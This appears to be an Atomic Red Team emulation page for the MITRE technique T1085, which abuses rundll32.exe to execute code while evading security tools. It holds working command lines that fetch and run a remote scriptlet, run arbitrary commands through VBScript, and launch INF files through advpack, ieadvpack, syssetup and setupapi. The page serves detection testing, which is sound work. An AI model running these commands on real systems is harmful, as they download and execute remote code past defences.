The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions
Control_RunDLLandControl_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this:
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Test execution of a remote script using rundll32.exe
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/src/T1085.sct |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| command_to_execute | Command for rundll32.exe to execute | string | calc.exe |
rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
Test execution of a command using rundll32.exe with advpack.dll.
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085.inf |
rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
Test execution of a command using rundll32.exe with ieadvpack.dll.
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085.inf |
rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
Test execution of a command using rundll32.exe with syssetup.dll.
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf |
rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute}
Test execution of a command using rundll32.exe with setupapi.dll.
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf |
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute}